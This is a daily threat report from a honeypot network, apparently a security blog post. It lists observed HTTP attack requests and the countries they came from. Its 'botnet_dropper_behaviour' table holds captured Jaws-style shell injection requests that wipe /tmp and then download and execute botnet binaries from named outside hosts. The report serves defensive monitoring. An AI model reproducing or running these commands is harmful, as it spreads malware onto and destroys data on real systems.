Table of Contents

Daily Report: 2025-07-28
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 431 requests were recorded during the day, originating from 5 different countries, with a peak of 124 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
US	Germany
CA	Dubai
US	Dubai
US	Dubai

botnet_dropper_behaviour
#

remote_addr	request
8.220.245.115	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.201.35	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
125.229.221.223	GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/89.221.203.116:6969/bins/arm7;chmod+777+arm7;./arm7+selfrep.jaws;wget+http:/\x5C/89.221.203.116:6969/bins/arm;chmod+777+arm;./arm+selfrep.jaws; HTTP/1.1
8.222.162.163	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
115.190.45.48	GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
13	2	GET /index.htm HTTP/1.1
22	2	GET http://91.224.59.5.sslip.io/check.txt HTTP/1.1
27	2	GET /check.txt HTTP/1.1
108	1	\x00\x0E\x08\xCC\xA1\x08\x9D\xAB\xBD\xEA\xF2\x00\x00\x00\x00\x00
109	1	\x00\x0E8\xCC\xA1\x08\x9D\xAB\xBD\xEA\xF2\x00\x00\x00\x00\x00
131	1	GET /environment.php HTTP/1.1
134	1	GET /phpinfo.aspx HTTP/1.1
135	1	GET /phpinfo.jsp HTTP/1.1
149	1	GET /cgi-bin/ HTTP/1.0
150	1	GET /cgi-bin/FormMail.pl HTTP/1.0
151	1	\x00\x0E\x08\xBA\xCA!w\xA7\x7F!\xD3\x00\x00\x00\x00\x00
152	1	\x00\x0E8\xBA\xCA!w\xA7\x7F!\xD3\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	124	US
1	48	IN
2	37	GB
3	20	JP
4	19	RU
5	19	FR
6	18	BG
7	18	DE
8	15	AU
9	15	PL
10	14	RO
11	11	NL
12	11	CA
13	11	CN
14	10	SC
15	6	CZ
16	4	LT
17	4	BE
18	4	SG
19	3	VN
20	3	GH
21	2	KZ
22	2	ES
23	2	CH
24	2	ZA
25	1	KR
26	1	HK
27	1	MU
28	1	MC
29	1	BR
30	1	AZ
31	1	IL
32	1	TW
33	1	IR

Report: 2025-07-27

27 July 2025·337 words

Repport Daily

Report: 2025-07-26

26 July 2025·272 words

Repport Daily

Report: 2025-07-25

25 July 2025·361 words

Repport Daily

	number_of_occurence	country_iso_code
0	124	US
1	48	IN
2	37	GB
3	20	JP
4	19	RU
5	19	FR
6	18	BG
7	18	DE
8	15	AU
9	15	PL
10	14	RO
11	11	NL
12	11	CA
13	11	CN
14	10	SC
15	6	CZ
16	4	LT
17	4	BE
18	4	SG
19	3	VN
20	3	GH
21	2	KZ
22	2	ES
23	2	CH
24	2	ZA
25	1	KR
26	1	HK
27	1	MU
28	1	MC
29	1	BR
30	1	AZ
31	1	IL
32	1	TW
33	1	IR

	number_of_occurence	country_iso_code
0	124	US
1	48	IN
2	37	GB
3	20	JP
4	19	RU
5	19	FR
6	18	BG
7	18	DE
8	15	AU
9	15	PL
10	14	RO
11	11	NL
12	11	CA
13	11	CN
14	10	SC
15	6	CZ
16	4	LT
17	4	BE
18	4	SG
19	3	VN
20	3	GH
21	2	KZ
22	2	ES
23	2	CH
24	2	ZA
25	1	KR
26	1	HK
27	1	MU
28	1	MC
29	1	BR
30	1	AZ
31	1	IL
32	1	TW
33	1	IR

Daily Report: 2025-07-28#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-07-28
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	124	US
1	48	IN
2	37	GB
3	20	JP
4	19	RU
5	19	FR
6	18	BG
7	18	DE
8	15	AU
9	15	PL
10	14	RO
11	11	NL
12	11	CA
13	11	CN
14	10	SC
15	6	CZ
16	4	LT
17	4	BE
18	4	SG
19	3	VN
20	3	GH
21	2	KZ
22	2	ES
23	2	CH
24	2	ZA
25	1	KR
26	1	HK
27	1	MU
28	1	MC
29	1	BR
30	1	AZ
31	1	IL
32	1	TW
33	1	IR